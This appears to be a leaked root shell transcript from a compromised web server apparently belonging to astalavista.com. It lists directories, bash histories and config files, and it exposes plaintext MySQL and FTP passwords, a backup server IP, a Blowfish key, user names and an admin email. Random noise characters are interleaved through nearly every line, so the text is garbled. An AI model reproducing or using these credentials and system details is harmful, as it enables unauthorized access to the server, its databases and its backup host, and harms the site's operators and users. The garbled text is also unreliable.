: e2 I7 W4 B+ I: Q1 @#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #! y$ T+ J/ ]. R3 z# b/ R
# |__| [__ | |__| | |__| | | | [__ | |__| #
5 t3 B3 g* q. ?+ F# | | ___] | | | |___ | | \/ | ___] | | | #
2 I6 G2 {/ R$ o: F# #
5 ^( f B8 }0 f#####################################################
1 | L8 [1 v+ S" Y5 Z# #
( ]/ b9 E( d# A* \0 O# Admin Contact - 链接标记support@secureservertech.com #
/ @0 {: u/ C. n$ q" Z# #. M4 Y1 i( l) y* i# D; G
# Available ShortCuts #
2 E$ k: o) Q# N# #
. A8 o: G* [7 `# nst - list active connections #
7 n0 C$ v' _3 s4 y# ddos - shows how many times each ip is connected #
, u8 g a, h2 h# ltr - restart the webserver #
B( K' P- H- r- }# phpc - edit the php config file #
* e3 G( x! O( q# htc - edit the webserver configuration file #
X/ B: B+ v% s# up - uptime #) W0 s3 O+ \0 i0 o$ z, I
# etd - edit the motd of the day file #: h: p5 P6 v7 N6 l$ p7 R
# htr - start and restart apache if needed #
, K7 H1 f, B: B; K# syng - shows active SYN_RECV connections #
" n/ L/ U3 o1 }5 L" W# synd - syn flood blocker - “synd -h” for usage #
! \1 G" M$ B$ m2 W7 o5 W0 x. J#####################################################
4 U& N; a H! G5 `% b# NOTES: #) h- x- Z5 _& j9 A* k
# Last Upgrade - 12-08-2008 by JF #1 g( ^/ z9 y" b9 o
# My.cnf/Mysql Optimization - 1-28-09 #
j: g, r9 p6 V9 Q9 W- N# #9 V6 I+ q6 U) o' O/ D& `
# #5 l n; W# z& `% E
# #
! b- H2 n8 @8 ^: u( s/ D#####################################################( ^ ]! p1 B4 I7 [
( k# N4 u; p1 v D" A8 \7 `sh-3.2# lastlog | grep -v Never
+ I: x5 }( \6 f: K. f+ ]+ X# ^Username Port From Latest
0 n; j% D" `; B' h, Qroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
' v( q4 R; p1 Z& K2 c2 \2 q) aadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20086 U7 U2 H& a( L+ w& V
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009+ z# o8 d E8 F7 [( \
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
& P* U& L% c5 ~& Z. y8 l& E$ Y# q/ o, v% i% T; g. x, y
sh-3.2# ls -la* f" ?4 O$ q- g4 K3 s* I
total 453376
% `% _9 V7 [1 }- D9 Udrwxr-x— 15 root root 4096 Jun 4 08:40 .
3 c0 \1 d0 m# I5 f& U- G7 t& cdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! F5 F4 g2 ?5 w
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip% [' d, z( C% l
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
$ o* z2 Q5 B6 G9 ]1 g-rw——- 1 root root 16836 Jun 4 07:21 .bash_history5 ?- d0 h# M0 s: g
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout$ U$ \+ i B2 Y, a* _+ {* e8 g
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile" ?: k+ g# A' g# i
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc+ V3 L' k# u# M) i
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh/ C. K+ A5 l3 Y6 a- v; }# J
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
: J' Q E0 `$ L' ]2 j-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql" p& f- e: q/ c- X: y8 p7 M$ ]' o4 I
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
# C* {. m" @) `. O* p0 X-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc& k C- S- E- S5 |2 c5 V
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
$ U% d3 [) ~! `' ^2 P' \! Z2 p7 ndrwx—— 2 root root 4096 Oct 28 2007 .elinks
8 z! x, A& N+ H0 d x3 E$ Hdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1' \+ J% Z/ {2 B6 V5 o. u
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
% U5 a% T O% C+ Z-rw——- 1 root root 0 Apr 16 13:19 .history$ A; B) B: i- y* b) @3 K6 m
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log: R5 ]5 _3 U+ a/ d' z) I1 D
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
- B9 [0 }# y0 I# g) V# ^4 I# B$ _-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
. ^; q/ y; t' b& a( _) T6 ~-rw——- 1 root root 35 Jun 2 14:23 .lesshst/ _9 p# Z$ h* Q: {/ }1 s2 c
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp, Q5 L" V$ R# o0 O7 k+ E
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
7 f9 K: C; [" a! `' W5 d-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
5 I i) T" a6 _ G, d-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2/ [4 i8 x+ ]6 @3 D
-rwx—— 1 root root 760 Sep 18 2008 lp
( I, K, i: H" v g; xdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
6 R9 A" s* d* ^2 n* p& ~; B6 N9 ?-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz3 `! v: j2 d: M+ o( R$ g# G5 c% ?7 o
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.16 }9 @5 t3 s0 W1 ?1 \6 P
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
( v8 r' S/ T# F-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz) G8 @8 P9 R! r- B" Y2 [0 U
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3* u' s& @* w# y, T* ^* @6 j
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
) B9 Z4 ?# c. @ a-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
" `4 L. [" p) K! P1 {-rw——- 1 root root 41 Oct 19 2007 .my.cnf7 W3 l$ w7 P! F- O
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
- `4 E& l: M2 s u% E2 `-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
# ~: p7 p8 X1 `-rw——- 1 root root 41 May 20 2008 .mytop" T3 \, g' Z. C1 p2 `& e
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.69 j+ B* n8 T1 l8 N+ A
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz- Y3 |6 `! l, ~# r" d& Q5 E
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp6 N" |2 f0 {0 n$ [6 V
-rw——- 1 root root 1462 Sep 21 2007 opt.php
7 G$ L2 E; S) b8 X4 p4 h: K7 P-rw-r–r– 1 root root 3371 Sep 22 2007 p% w X+ K5 x5 e/ f
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
7 Q; u* q; A5 o2 m. s. L% K" h-rw——- 1 root root 1024 Feb 3 21:32 .rnd" J. c! r" O" Z9 S" W$ d
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
4 T6 h* F; G$ N) n& a" f-rw-r–r– 1 root root 887 Nov 28 2007 server.key
: J4 K7 N9 h& m4 Zdrwx—— 2 root root 4096 Oct 10 2008 .ssh3 _; x. e0 L# n/ m
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat# y" q1 G6 ]) ^
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
: w6 t! G. d" v) s- a: S [+ P-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip: d" |2 X: s8 e0 y- }$ V
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1( l4 G. o* \+ g$ c
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp1 p+ y) |: c3 M& m/ ~
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
+ i: B7 G7 y3 |drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
+ O7 U" Z8 i' e; I6 M: d-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2) g& E/ j; V% W
-rw——- 1 root root 12997 May 16 2008 .viminfo
3 [1 I+ Z, Y! k$ }5 `& g( U( [0 O, r9 G/ t; ~1 Z$ G, E
sh-3.2# cat .bash_history
( x/ k" i1 ~5 E1 O+ y# M3 g/ u[snip]1 ~5 Y$ o& c0 U9 ]$ v' l) ~( z
wget cp4sst.com/sstlinux.tar.gz
. b- y) ^: y: c7 U1 rtar zxvf sstlinux.tar.gz
1 h* Q1 i6 l3 H. O8 s% e2 O" o) Acd linux-2.6.27.100 ]* S# p% u$ r
sh install.sh
1 ] c# q4 F4 f2 m# a4 I; umake bzImage ; make modules ; make modules_install ; make install
+ v/ {! O- ?6 q% l/ b4 y. omake clean. a9 ~; V8 ~1 Y( ~+ L- T' p z
service mysqld restart8 @ F# F4 Q" {# J5 x3 V' w
[snip]* M/ i. J7 ]7 J8 C3 F
cd /usr/sbin/
2 y0 Y6 G" ` m; r$ Tchmod 4777 traceroute
8 f. h1 ]7 I$ wchmod 4777 ping
, m7 }6 c- j9 R" c" `2 Ftraceroute -I 链接标记[url]www.astalavista.ch[/url]
, {- D% Z3 y# F4 ?0 A, i[snip]3 I/ A0 B% k! O- j
vi /etc/csf/csf.conf
, Y; L$ n5 @/ b1 m: \traceroute google.ch3 s/ n# D: A7 F G% ]2 u! V
service csf restart$ B. g3 P# w- Z' S
tracert google.ch) f" y" `8 o4 l% D
service csf restart* A4 U/ }" g2 Z6 C/ ?
traceroute 链接标记[url]www.google.ch[/url]1 m% N( ]& b" M5 Z5 y( |" J
tracert 链接标记[url]www.google.ch[/url]
9 \; e, f% h+ s0 L+ o6 Xtraceroute 链接标记[url]www.google.ch[/url]5 F$ e6 ?0 t0 K
locate traceroute
% b4 L! o$ f4 ochown 4755 /bin/traceroute8 X. I: {4 W. ^1 K0 R
chown 4777 /bin/traceroute
8 M" \' H/ F8 w* |locate ping
$ d0 J/ C4 o7 i& Jchown 4755 /bin/ping
# W) }- Z) q! Kchown 4777 /bin/ping8 G* j# Z) @% W
cd /bin/
) o& L2 N- R' c9 g& P- e' R* qls -ali | grep ping
8 E" z/ e) x$ }& A# u" ^4 Z/ Dchown root ping$ t& K: j8 m# j: q* R! [
chmod 4755 ping
1 Y: _0 V- j+ Z2 \# E# pls -ali | grep traceroute/ C6 R5 t& r& w4 ^0 E- p
chown root traceroute
1 a0 J/ W# v7 d5 b; lchmod 4755 traceroute
5 Q; F' X, @0 v' g, h& x1 Jls -ali | grep traceroute, P/ N- M. v6 X5 H$ q
traceroute -I 链接标记[url]www.google.ch[/url]
( [1 n% K4 T1 K9 d9 jtraceroute 链接标记[url]www.google.ch[/url]
- H% @/ p: r2 t6 \' vwhois pmsantos.ch; x L+ R Z w9 _. g
[snip]
5 |7 i1 l$ V# x D9 @+ E8 cmysql -h com_contrexx2_live < /root/defaultp_ports.sql
& P) w! ^9 n- ^+ S& I) bmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
. D* E7 t4 E- U2 a% Q. tmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
" H( I& A) A. n7 Zmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
: `& s! M4 ]: c5 ntop
: L6 J/ }2 {- O9 {7 H6 ` Vping ssth.ch
. H+ C$ T. Y- n2 _ping asdlkfaljgasd???ljg???lasj.ch3 n6 @0 D$ {8 d* ?
ping asdlkfaljgasdlasj.ch
! ~2 Y2 C! A1 g @ping 链接标记[url]www.ssth.ch[/url]
, ]# n6 i/ H% f% `, m/ m, Q1 C, j* ~ping ssth.ch
+ g! ~$ r7 ^) i* Bnslookup 链接标记[url]www.google.ch[/url]
q/ E! F$ q0 g$ Lnslookup 链接标记[url]www.ssth.ch[/url]$ u" ?0 s0 g. F8 U. d2 h# b0 D
man nslookup( q( L; U% n. o# ]" d& t x
ping 链接标记[url]www.google.ch[/url]
3 p a8 O& [- l4 G1 t: |, `3 gnslookup 链接标记[url]www.google.ch[/url]
1 O& x1 z6 y& v+ y7 u( gnslookup 链接标记[url]www.google.ch[/url]
" m% r v2 M( |+ Z) D5 {nslookup salfjasdlf.ch8 u% o& I$ T, n
[snip]9 U: ~" ~" K/ N/ G
openssl passwd -1 sadf
% [- a3 P5 u, t; p- gopenssl passwd -1 5cZNHstdTy2 a; u- ^- G' j, O$ w
mysql% t* r8 R. B& C5 |# ^, s4 s
mysql/ w5 X+ h' Z7 ?7 U' w6 `
locate proftp. b1 ^; v. O, e) A% E' c
vi /etc/proftpd.passwd; R' [" i8 }; k. y
service proftpd restart4 R2 k/ G+ o9 [
locate proftpd.conf
$ x+ k' L6 r; r* E- \vi /etc/proftpd.conf7 z: ?1 P/ M8 ]6 E
vi /etc/proftpd.passwd; E0 C" ?2 F: X, G% _/ }: k
service proftpd restart6 t8 p1 `" T) O+ P
[snip]1 H9 l5 ~0 F y$ y& v$ {
/bin/sh /home/com/backup_system/backup.sh
4 }) V6 {( Y& N0 b& [tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
, a$ | M6 y6 Z2 umysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql! @$ m8 q; i" C/ s( ?8 }2 `
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql4 n) P; ]! W; Q x8 \
ls -ali
: ^$ x1 x# S* z! i y# A; Mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql7 i4 V2 R+ _! g. F5 P: p" R0 g) C
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
7 W z: K6 c0 { Q" jcrontab -l
; P1 x0 ^9 G2 {" j+ ]; Qcrontab -l
5 |1 }9 g7 j7 C6 i0 l; Nphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
, K* o5 Z- k" \! J7 l. e: L% J/ t/home/com/public_html/modifications/cronjobs/exploits.sh+ t3 o0 ^" v: V: o2 t
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]: E. k9 T, H! m+ k
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz! H. ?3 l' C$ f7 L. L
cd lsws-4.0.3) I" Q6 |: l. }) Z* Q" I$ p
sh install.sh
6 N# s9 n% H# y! W" \$ f& T( `, Juptime
8 R$ ^- R% w, ]2 S uhdparm -tt /dev/sda, d8 I r/ s7 f1 P. l
iostat8 f: L3 O. v* H4 ^" {. C. V* l
yum install iostat
. o! e" z0 z* a t4 K, Qiostat
, f$ n$ Z, Q# \# ^' N/ @, y; Ywhereis iostat
! x t" F+ ]! B( |, x: _2 Y0 U6 Iyjm clean all
+ M* d) i+ |* H7 s8 p# B d3 ayum clean all ; yum -y update4 n$ d; P" o8 W( `1 T4 x$ ^+ g
iostat# w9 A+ Z/ t& q6 j' z
yum install systat; R* p. u H$ H4 N" r: q; S) s* e6 W j
rpm -qa | grep iostat1 }0 N2 T O/ u9 H: p
rpm -qa | grep sysstat K/ U1 _: o. [" b
rpm -qa | grep systat- x0 }7 L. K1 `* y8 p
dmesg -c: n' F/ E8 T: \4 Z
sysctl -p5 e6 r% z$ A- \) M- `0 f
uname -r1 W5 S& x; W4 U( T
cd /usr/src) i+ {: H( s. Z
wget nix101.com/kernels/sstlinux.tar.gz6 I* Y% Q+ g6 }/ _
shutdown -r now
$ h, ?+ V% @3 \% dnano -w /boot/grub/grub.conf
- G! E* K1 x* n' o8 t9 _ y2 f& T
sh-3.2# cat .my.cnf3 h5 U z0 G0 N. E3 _0 ~
[client]. G+ A% H' Y( g
user=da_admin9 {/ ^1 E' v- W; \7 R
password=X9dctmRH
# f2 l4 G2 W+ C" Y* v# c. j9 K. F7 @% G' z0 d. b
sh-3.2# cat /home/com/backup_system/backup.sh
3 a4 _7 i2 v8 v5 u# O z$ `4 N$ ~#!/bin/sh
% G& ^4 u: r1 S' Y5 a#####################################################################4 o7 Y4 h) L& w) j. d3 I
# #
& y. D! Q' }" Z2 A5 [0 w! M0 d# incremental backup for astalavista.com #, ?9 q1 j. p: |6 `7 z( y
# ## n% u9 x. U' F7 N; {$ D
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
! ]2 q! V. l# \ M0 O# #
6 r& F6 T: L5 n& h- y#####################################################################2 R; L8 a" i; d1 C
[snip]
+ u1 ]! J# A/ N$ Z: L" APROG_DIR=”/home/com/backup_system”;
% o4 m8 \( C( w1 P BBACKUP_DIR=”/home/com/backups”;" D, Q4 p S$ L2 F. G$ e0 r
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;$ i% Y7 `$ b: U
# ftp for synology backup server
0 B$ \3 \$ X! w, jFTP_HOST=”212.254.194.163″;6 _ g) K; o; C0 b4 H7 f* Y
FTP_PORT=”21″;
8 p# [& |/ l" ?3 u5 A! j% `FTP_USER=”astalavista.com”;
* I% W6 V- _9 a! f \+ ?FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
, W2 s5 j5 f; c6 @* KFTP_DIR=”/astalavista.com”;
+ g8 { R* v+ P# database
0 e1 L# v* V" b0 W5 b( z' FDB_HOST=”localhost”;
2 p a5 t8 z5 t% `) DDB_USER=”contrexxuser2″;
/ y3 k n4 G( Q+ Y: C; _DB_PASS=”0fEYNZgXz1pKe”;1 r+ S/ F7 @1 G7 k/ j5 s
DB_DATABASE1=”com_contrexx2_live”;
( H+ }+ }- _+ X0 u1 Z4 i# aDB_DATABASE2=”com_contrexx2″;" x( U7 k! Z! r
[snip]
- V7 L/ d0 Y! `+ }* [* Yftp -in $FTP_HOST $FTP_PORT <<EOF
6 h3 z8 G) @+ M. {; O: yquote USER $FTP_USER
P5 s# Q8 m/ @! nquote PASS $FTP_PASS9 `% ^8 Q7 W5 R, C, C
cd $FTP_DIR5 e: C( y, A _9 [) q; F
put $DB_FULLNAME-SQL_Dump.tar
5 Z4 K8 {7 S2 M+ I& L8 Aput $BACKUP_FULLNAME-Public_HTML.tar- X5 w, F+ L3 I* p! M
close
5 x( W! c; ^/ b) D/ I9 ibye
5 ]0 \4 _6 N0 SEOF' C) f( I" H9 M6 f8 t7 W
( z8 G6 @- V+ v. |" ~: u) |
sh-3.2# cd /home
7 C6 E6 H# @% L7 j5 Nsh-3.2# ls -la
" i* U# k9 Y4 D6 r5 ]total 120# t+ v G; G- Z7 i/ O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
) U2 D# l2 M/ }6 `, S# {+ v& idrwxr-xr-x 25 root root 4096 Jun 3 02:43 ../ ?2 V. P, a: J$ Y. Y
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
- Z7 z& i9 w" x+ e: Z- i: ^-rw——- 1 root root 8192 Jun 4 03:03 aquota.group8 Y4 x. L, i; a) n# U
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user+ e- l6 \# n3 {7 }& |) }
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
- s; R' O. f6 N/ H5 Qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup k6 Q1 _4 h) ^. h
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
5 j9 ?/ Z( N1 O7 ?3 Sdrwx–x–x 10 com com 4096 Apr 28 12:40 com# R% x4 B* t5 k, z
drwxr-xr-x 2 root root 4096 May 17 2007 ftp$ `+ h2 z- E! i
drwx—— 3 jon jon 4096 Sep 21 2007 jon
8 ?& }$ P6 R/ o' @5 rdrwx—— 2 root root 16384 Sep 11 2007 lost+found; J( H- U; ~* l$ M/ }) E
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 Y0 D4 _& i2 W/ Q* z- \drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
% T: w+ \; h9 O1 ^drwx—— 2 jon jon 4096 Sep 15 2007 test
0 Y$ o* v& Z/ s( Y) Sdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 w! P# M! I7 O& t
" h8 X0 X6 m% W6 C9 q: Csh-3.2# cd admin5 T: u3 y C& G
sh-3.2# ls -la
4 N: u: V4 d7 P6 Ltotal 1735896 `9 g- |, @& g& L$ z4 |
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
; q% _( I ^$ e5 @# j* m: @" bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- D8 D; b! S5 |$ I$ zdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
3 y+ Y0 q* ` e. adrwx—— 2 admin admin 4096 Sep 28 2007 backups% T' ?0 i0 Z4 _5 j! m* e! ~
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
' e# x6 H" |' P% X# D2 J-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
& g! S! s G. [/ W) n4 _-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile3 \$ v4 W7 k- l7 X7 d6 I
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc. e+ [7 j* M9 |- c
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
, s% c7 t! `* A2 C: k# Hdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
6 |! {; t! y: g" s/ d9 {drwxrwx— 3 admin mail 4096 Sep 21 2007 imap1 H2 N$ k) C& n
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
, t( h( e( f! O* a/ sdrwx—— 2 admin admin 4096 Sep 21 2007 mail
1 R. W, S) s* o0 R-rw-r–r– 1 root root 716 Nov 28 2007 server.csr7 U$ X- p/ B5 n* r) q
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
, U9 z& m6 v" Y% w% P+ I# {-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
* {; m) O" V* }! u" _# ^" ~-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz' A' T! O X# K& s* q0 U2 L
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
6 A+ e% [/ k' ?
. S9 z, I/ W8 T; Q; e/ |+ c, m" I- Dsh-3.2# ..
; U/ S2 T- P6 u' D9 t+ B5 bsh-3.2# cd jon8 f Y* p' U2 A4 {' F8 x
sh-3.2# ls -la
: m, d1 M$ q3 Mtotal 36
* Y9 N' T. C6 L5 `4 Vdrwx—— 3 jon jon 4096 Sep 21 2007 .
3 a4 {$ u( }7 X# X4 ?3 Wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 v& r+ K' N( j- ^& g6 A' w; e
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
E, K* F8 N7 D9 `4 a3 V, z. M( r-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
! K% L6 ^8 x9 J$ f/ O6 `; a; w-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
2 i1 N1 q' j7 e( v6 _- _-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc! P. o1 p0 a9 n( u4 f5 F
-rw-r–r– 1 root root 24 Sep 21 2007 info.php" x/ h0 W8 ~8 i: V# d
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
2 z0 C. ?: K7 H" w# @
+ G; c2 X: H* Y S ush-3.2# cd ..
" Z& _9 V4 z/ A7 _% I7 h Ush-3.2# cd test
5 I1 X( s& g6 V8 R9 U a qsh-3.2# ls -la* H) t4 C( h5 L1 @1 J; r. h
total 48
( z3 {- n# o0 z1 @+ m0 ]drwx—— 2 jon jon 4096 Sep 15 2007 .1 G |3 S8 _( ?! m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 R+ G* A1 j3 H7 y0 X& r2 X# V$ M q
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history7 y; o k( `$ `" Z
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
2 `9 i, q: s4 m3 u* n! `-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
* d8 r, X: A7 h-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc" k7 T5 s( b) M; \7 B
sh-3.2# cat .bash_history
8 r, @* X8 A- d) j& P: |/usr/bin/mysqladmin -u root password PoliuJhytg67
& ^* d6 K& W% i. f
# U, q' s/ D5 {# M! }( p* W2 gsh-3.2# cd ... Q+ N( y, B( I2 D+ T2 ~; ~7 y
sh-3.2# cd astanet
) S9 W. g c/ N7 X1 B1 F/ Ksh-3.2# ls -la
3 o0 r5 w M8 x( Qtotal 52! p' c9 k% k, s2 }6 K+ P
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
& y- N& }& o* A% Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% i% J$ [" q7 e5 a. idrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth k' o* G, X r8 ^ F( Z6 H2 F
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history' G6 ~ @: F+ f# B0 \
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 U$ E+ P. ^1 L' @" `6 S( l' O e6 n7 G
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile- ?% T6 I# D; q
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
- w# w! f" E g4 Bdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains) ]/ j1 ` X4 D: K- ]7 c+ a+ w
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap6 ~; K6 {2 N l
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
, C! A6 @, k- G-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history4 W/ m7 i/ k* P6 T
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 [) [, |6 A" o1 \0 j7 M7 U' G% \4 S) s-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow( ~4 K( L& j/ a& ~/ E
5 ]) E" O- ]0 z0 ]) X1 l' ysh-3.2# cd auth/
9 g- v% ^ |1 r9 L( Y, dsh-3.2# ls -la U( c& \( w* G0 U8 T/ ^: }$ M
total 28: Q4 M! y0 ~8 P4 B& G
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
+ L) C3 L& ?& A" x& Jdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..6 x5 h# w% |: z, ]. N) i
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
# t% o" F m! f9 T! n-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php, B) J9 g$ d5 w) X; r9 {8 t
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
4 F7 h1 s+ j3 {# m2 {-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
5 ^) {$ @. V* G/ Z. P9 F-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
3 N5 @3 @" G+ ]1 w- n5 t6 `( x2 f2 I% i- i# {/ d, l, `
sh-3.2# cat hackercontest.config.inc.php
7 b! Y' A+ h7 J5 A5 k0 x+ t<?PHP+ }( l$ o) X' h0 t- ]
// Variabeln f?r Verbindung zur Datenbank //8 u, q# s8 P7 C1 ^
$conxHost = ‘localhost’; // MySQL hostname
7 W/ B6 K; X0 ]) z$conxUser = ‘hackercontest’; // MySQL user/ ?. |( v- U: ^0 {3 y
$conxPassword = ‘K6m@7dUc’; // MySQL password$ p0 C! X, o2 h5 m9 a
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
/ V" {) U1 w& U?>6 C$ x# ]/ |8 @9 k+ s
sh-3.2# cat hosting.config.inc.php
, h# ?& V/ `1 R6 {<?PHP$ _1 ?) g2 h$ k( X' X# S3 ^
// Variabeln f?r Verbindung zur Datenbank //
5 r. q7 }. h* X+ f$conxHost = ‘localhost’; // MySQL hostname
9 N5 e1 u. z8 L2 @ O' E4 `, o0 w" G$conxUser = ‘hostinguser’; // MySQL user
' Y8 S* u8 u& f$conxPassword = ‘cXvB3981′; // MySQL password
3 v# S! J. F" q5 o) f. t$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
6 p4 [$ p+ n" t$ a I0 d7 i* \( v5 f! A?>
/ L" _$ f6 @! ?2 m9 k$ L' ^$ d8 G1 R& k$ p
sh-3.2# cd ..
/ V: d( ?: h/ ^1 O3 S% A* lsh-3.2# cd com( `, v1 _9 i( p
sh-3.2# ls -la
8 e2 U# x: S3 `; S8 dtotal 141208
" B/ k ^& \2 n Z% p5 mdrwx–x–x 10 com com 4096 Apr 28 12:40 .
+ E, W5 N" V: [- |drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! K! J3 W* `. H& G. w
drwx—— 2 com com 4096 Jun 4 04:04 backups
+ V/ x* R# W1 ?+ O-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
& N9 R0 i) C) l) Kdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
